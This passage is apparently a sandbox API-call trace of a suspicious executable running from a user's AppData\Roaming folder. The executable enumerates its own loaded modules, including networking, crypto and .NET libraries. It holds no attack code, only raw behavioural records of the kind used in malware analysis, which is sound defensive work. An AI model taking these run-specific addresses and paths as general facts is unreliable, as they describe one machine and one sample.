hModule=0x65a20000, lpmodinfo=0x22e2c90, cb=0xc | out: lpmodinfo=0x22e2c90*(lpBaseOfDll=0x65a20000, SizeOfImage=0x23000, EntryPoint=0x65a25570)) returned 1 [0142.607] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.607] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a20000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rasman.dll") returned 0xa [0142.608] CoTaskMemFree (pv=0x55b0d0) [0142.608] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.608] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a20000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll")) returned 0x1e [0142.609] CoTaskMemFree (pv=0x55b0d0) [0142.609] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a10000, lpmodinfo=0x22e4d9c, cb=0xc | out: lpmodinfo=0x22e4d9c*(lpBaseOfDll=0x65a10000, SizeOfImage=0x10000, EntryPoint=0x65a13820)) returned 1 [0142.610] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.610] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a10000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rtutils.dll") returned 0xb [0142.611] CoTaskMemFree (pv=0x55b0d0) [0142.611] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.611] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a10000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll")) returned 0x1f [0142.612] CoTaskMemFree (pv=0x55b0d0) [0142.612] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f30000, lpmodinfo=0x22e6ea8, cb=0xc | out: lpmodinfo=0x22e6ea8*(lpBaseOfDll=0x73f30000, SizeOfImage=0x5f000, EntryPoint=0x73f34af0)) returned 1 [0142.613] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.613] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f30000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ws2_32.dll") returned 0xa [0142.613] CoTaskMemFree (pv=0x55b0d0) [0142.614] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.614] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f30000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")) returned 0x1e [0142.614] CoTaskMemFree (pv=0x55b0d0) [0142.614] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71400000, lpmodinfo=0x22e8fb4, cb=0xc | out: lpmodinfo=0x22e8fb4*(lpBaseOfDll=0x71400000, SizeOfImage=0x4f000, EntryPoint=0x7140d850)) returned 1 [0142.615] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.615] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71400000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0142.616] CoTaskMemFree (pv=0x55b0d0) [0142.616] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.616] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71400000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")) returned 0x1f [0142.617] CoTaskMemFree (pv=0x55b0d0) [0142.617] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71450000, lpmodinfo=0x22eb0c0, cb=0xc | out: lpmodinfo=0x22eb0c0*(lpBaseOfDll=0x71450000, SizeOfImage=0x9b000, EntryPoint=0x7148f7e0)) returned 1 [0142.618] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.618] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71450000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="winhttp.dll") returned 0xb [0142.623] CoTaskMemFree (pv=0x55b0d0) [0142.623] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.623] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71450000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll")) returned 0x1f [0142.624] CoTaskMemFree (pv=0x55b0d0) [0142.624] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71520000, lpmodinfo=0x22ed1cc, cb=0xc | out: lpmodinfo=0x22ed1cc*(lpBaseOfDll=0x71520000, SizeOfImage=0x12000, EntryPoint=0x71524510)) returned 1 [0142.625] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.625] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71520000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ondemandconnroutehelper.dll") returned 0x1b [0142.626] CoTaskMemFree (pv=0x55b0d0) [0142.626] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.626] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71520000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll")) returned 0x2f [0142.627] CoTaskMemFree (pv=0x55b0d0) [0142.627] GetModuleInformation (in: hProcess=0x2a0, hModule=0x714f0000, lpmodinfo=0x22ef318, cb=0xc | out: lpmodinfo=0x22ef318*(lpBaseOfDll=0x714f0000, SizeOfImage=0x2f000, EntryPoint=0x714fbb70)) returned 1 [0142.628] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.628] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x714f0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0142.629] CoTaskMemFree (pv=0x55b0d0) [0142.629] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.629] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x714f0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")) returned 0x20 [0142.630] CoTaskMemFree (pv=0x55b0d0) [0142.630] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76900000, lpmodinfo=0x22f142c, cb=0xc | out: lpmodinfo=0x22f142c*(lpBaseOfDll=0x76900000, SizeOfImage=0x7000, EntryPoint=0x76901e10)) returned 1 [0142.631] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.631] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76900000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0142.632] CoTaskMemFree (pv=0x55b0d0) [0142.632] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.632] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76900000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NSI.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")) returned 0x1b [0142.633] CoTaskMemFree (pv=0x55b0d0) [0142.633] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a860000, lpmodinfo=0x22f3528, cb=0xc | out: lpmodinfo=0x22f3528*(lpBaseOfDll=0x6a860000, SizeOfImage=0x13000, EntryPoint=0x6a8625d0)) returned 1 [0142.634] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.634] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a860000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0142.637] CoTaskMemFree (pv=0x55b0d0) [0142.637] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.637] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a860000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll")) returned 0x21 [0142.638] CoTaskMemFree (pv=0x55b0d0) [0142.638] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a840000, lpmodinfo=0x22f563c, cb=0xc | out: lpmodinfo=0x22f563c*(lpBaseOfDll=0x6a840000, SizeOfImage=0x14000, EntryPoint=0x6a843c10)) returned 1 [0142.639] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.639] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a840000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0142.640] CoTaskMemFree (pv=0x55b0d0) [0142.640] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.640] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a840000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll")) returned 0x20 [0142.642] CoTaskMemFree (pv=0x55b0d0) [0142.642] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74eb0000, lpmodinfo=0x22f7750, cb=0xc | out: lpmodinfo=0x22f7750*(lpBaseOfDll=0x74eb0000, SizeOfImage=0x13ff000, EntryPoint=0x7506b990)) returned 1 [0142.643] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.643] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74eb0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="shell32.dll") returned 0xb [0142.644] CoTaskMemFree (pv=0x55b0d0) [0142.644] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.644] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74eb0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0142.645] CoTaskMemFree (pv=0x55b0d0) [0142.645] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76800000, lpmodinfo=0x22f985c, cb=0xc | out: lpmodinfo=0x22f985c*(lpBaseOfDll=0x76800000, SizeOfImage=0x37000, EntryPoint=0x76803b50)) returned 1 [0142.646] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.646] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76800000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="cfgmgr32.dll") returned 0xc [0142.647] CoTaskMemFree (pv=0x55b0d0) [0142.647] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.647] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76800000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0142.648] CoTaskMemFree (pv=0x55b0d0) [0142.648] GetModuleInformation (in: hProcess=0x2a0, hModule=0x745b0000, lpmodinfo=0x22fb970, cb=0xc | out: lpmodinfo=0x22fb970*(lpBaseOfDll=0x745b0000, SizeOfImage=0x4f9000, EntryPoint=0x747b7610)) returned 1 [0142.649] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.649] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x745b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="windows.storage.dll") returned 0x13 [0142.652] CoTaskMemFree (pv=0x55b0d0) [0142.652] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.653] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x745b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")) returned 0x27 [0142.654] CoTaskMemFree (pv=0x55b0d0) [0142.654] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74520000, lpmodinfo=0x22fda9c, cb=0xc | out: lpmodinfo=0x22fda9c*(lpBaseOfDll=0x74520000, SizeOfImage=0x8d000, EntryPoint=0x74569b90)) returned 1 [0142.655] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.655] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74520000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="shcore.dll") returned 0xa [0142.656] CoTaskMemFree (pv=0x55b0d0) [0142.656] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.656] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74520000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shcore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")) returned 0x1e [0142.657] CoTaskMemFree (pv=0x55b0d0) [0142.657] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76470000, lpmodinfo=0x22ffba8, cb=0xc | out: lpmodinfo=0x22ffba8*(lpBaseOfDll=0x76470000, SizeOfImage=0x44000, EntryPoint=0x76477410)) returned 1 [0142.658] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.658] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76470000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="powrprof.dll") returned 0xc [0142.659] CoTaskMemFree (pv=0x55b0d0) [0142.659] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.659] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76470000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")) returned 0x20 [0142.660] CoTaskMemFree (pv=0x55b0d0) [0142.660] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f20000, lpmodinfo=0x2301cbc, cb=0xc | out: lpmodinfo=0x2301cbc*(lpBaseOfDll=0x73f20000, SizeOfImage=0xf000, EntryPoint=0x73f22e40)) returned 1 [0142.661] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.661] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f20000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0142.662] CoTaskMemFree (pv=0x55b0d0) [0142.662] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.662] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f20000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")) returned 0x1f [0142.663] CoTaskMemFree (pv=0x55b0d0) [0142.664] GetModuleInformation (in: hProcess=0x2a0, hModule=0x70a50000, lpmodinfo=0x2303dc8, cb=0xc | out: lpmodinfo=0x2303dc8*(lpBaseOfDll=0x70a50000, SizeOfImage=0x84000, EntryPoint=0x70a76530)) returned 1 [0142.665] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.665] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x70a50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0142.668] CoTaskMemFree (pv=0x55b0d0) [0142.668] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.668] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x70a50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\DNSAPI.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")) returned 0x1e [0142.669] CoTaskMemFree (pv=0x55b0d0) [0142.669] GetModuleInformation (in: hProcess=0x2a0, hModule=0x713f0000, lpmodinfo=0x2305ed4, cb=0xc | out: lpmodinfo=0x2305ed4*(lpBaseOfDll=0x713f0000, SizeOfImage=0x8000, EntryPoint=0x713f1fc0)) returned 1 [0142.670] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.670] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x713f0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0142.672] CoTaskMemFree (pv=0x55b0d0) [0142.672] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x713f0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\WINNSI.DLL" (normalized: "c:\\windows\\syswow64\\winnsi.dll")) returned 0x1e [0142.673] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6fa30000, lpmodinfo=0x2307fe0, cb=0xc | out: lpmodinfo=0x2307fe0*(lpBaseOfDll=0x6fa30000, SizeOfImage=0x8000, EntryPoint=0x6fa31920)) returned 1 [0142.674] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6fa30000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0142.675] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6fa30000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")) returned 0x20 [0142.676] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f9e0000, lpmodinfo=0x230a0f4, cb=0xc | out: lpmodinfo=0x230a0f4*(lpBaseOfDll=0x6f9e0000, SizeOfImage=0x47000, EntryPoint=0x6f9f58d0)) returned 1 [0142.677] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f9e0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0142.678] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f9e0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\fwpuclnt.dll" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")) returned 0x20 [0142.680] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71540000, lpmodinfo=0x230c208, cb=0xc | out: lpmodinfo=0x230c208*(lpBaseOfDll=0x71540000, SizeOfImage=0x1b000, EntryPoint=0x71549050)) returned 1 [0142.681] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71540000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0142.683] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71540000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0142.684] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6fdf0000, lpmodinfo=0x230e314, cb=0xc | out: lpmodinfo=0x230e314*(lpBaseOfDll=0x6fdf0000, SizeOfImage=0xa000, EntryPoint=0x6fdf3200)) returned 1 [0142.685] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6fdf0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0142.687] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6fdf0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll")) returned 0x1f [0142.688] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f970000, lpmodinfo=0x2310420, cb=0xc | out: lpmodinfo=0x2310420*(lpBaseOfDll=0x6f970000, SizeOfImage=0x64000, EntryPoint=0x6f98afd0)) returned 1 [0142.689] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f970000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="schannel.dll") returned 0xc [0142.691] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f970000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll")) returned 0x20 [0142.692] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f90000, lpmodinfo=0x2312534, cb=0xc | out: lpmodinfo=0x2312534*(lpBaseOfDll=0x73f90000, SizeOfImage=0x178000, EntryPoint=0x73fe8a90)) returned 1 [0142.693] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f90000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0142.694] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f90000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPT32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")) returned 0x1f [0142.695] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764c0000, lpmodinfo=0x2314640, cb=0xc | out: lpmodinfo=0x2314640*(lpBaseOfDll=0x764c0000, SizeOfImage=0xe000, EntryPoint=0x764c5410)) returned 1 [0142.707] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764c0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0142.709] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764c0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSASN1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")) returned 0x1e [0142.710] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f960000, lpmodinfo=0x231674c, cb=0xc | out: lpmodinfo=0x231674c*(lpBaseOfDll=0x6f960000, SizeOfImage=0x10000, EntryPoint=0x6f964600)) returned 1 [0142.711] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f960000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mskeyprotect.dll") returned 0x10 [0142.712] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f960000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll")) returned 0x24 [0142.716] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f940000, lpmodinfo=0x2318a7c, cb=0xc | out: lpmodinfo=0x2318a7c*(lpBaseOfDll=0x6f940000, SizeOfImage=0x20000, EntryPoint=0x6f94d120)) returned 1 [0142.717] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f940000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ncrypt.dll") returned 0xa [0142.718] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f940000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll")) returned 0x1e [0142.719] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f910000, lpmodinfo=0x231ab88, cb=0xc | out: lpmodinfo=0x231ab88*(lpBaseOfDll=0x6f910000, SizeOfImage=0x2c000, EntryPoint=0x6f92bb10)) returned 1 [0142.721] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f910000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="NTASN1.dll") returned 0xa [0142.722] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f910000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NTASN1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll")) returned 0x1e [0142.723] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f8f0000, lpmodinfo=0x231cc94, cb=0xc | out: lpmodinfo=0x231cc94*(lpBaseOfDll=0x6f8f0000, SizeOfImage=0x1a000, EntryPoint=0x6f8ffa70)) returned 1 [0142.725] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ncryptsslp.dll") returned 0xe [0142.726] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll")) returned 0x22 [0142.727] CloseHandle (hObject=0x2a0) returned 1 [0142.742] GetCurrentProcessId () returned 0xbb4 [0142.742] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb4) returned 0x2a0 [0142.742] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x240cab4, cb=0x100, lpcbNeeded=0x19e600 | out: lphModule=0x240cab4, lpcbNeeded=0x19e600) returned 1 [0142.743] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x240cbc0, cb=0x200, lpcbNeeded=0x19e600 | out: lphModule=0x240cbc0, lpcbNeeded=0x19e600) returned 1 [0142.746] GetModuleInformation (in: hProcess=0x2a0, hModule=0x400000, lpmodinfo=0x240ce00, cb=0xc | out: lpmodinfo=0x240ce00*(lpBaseOfDll=0x400000, SizeOfImage=0x8000, EntryPoint=0x0)) returned 1 [0142.747] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x400000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe") returned 0x3a [0142.747] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x400000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe")) returned 0x60 [0142.747] GetModuleInformation (in: hProcess=0x2a0, hModule=0x771d0000, lpmodinfo=0x240f00c, cb=0xc | out: lpmodinfo=0x240f00c*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0142.747] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x771d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0142.747] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x771d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0142.748] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f850000, lpmodinfo=0x2411110, cb=0xc | out: lpmodinfo=0x2411110*(lpBaseOfDll=0x6f850000, SizeOfImage=0x59000, EntryPoint=0x6f860780)) returned 1 [0142.748] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f850000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0142.748] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f850000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0142.748] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76720000, lpmodinfo=0x241321c, cb=0xc | out: lpmodinfo=0x241321c*(lpBaseOfDll=0x76720000, SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0142.748] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76720000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0142.749] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76720000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0142.749] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76910000, lpmodinfo=0x2415330, cb=0xc | out: lpmodinfo=0x2415330*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0142.749] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76910000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0142.749] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76910000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0142.750] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73e50000, lpmodinfo=0x2417478, cb=0xc | out: lpmodinfo=0x2417478*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0142.750] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73e50000, lpBaseName=0x55b0d0, nSize=0x800 | out: 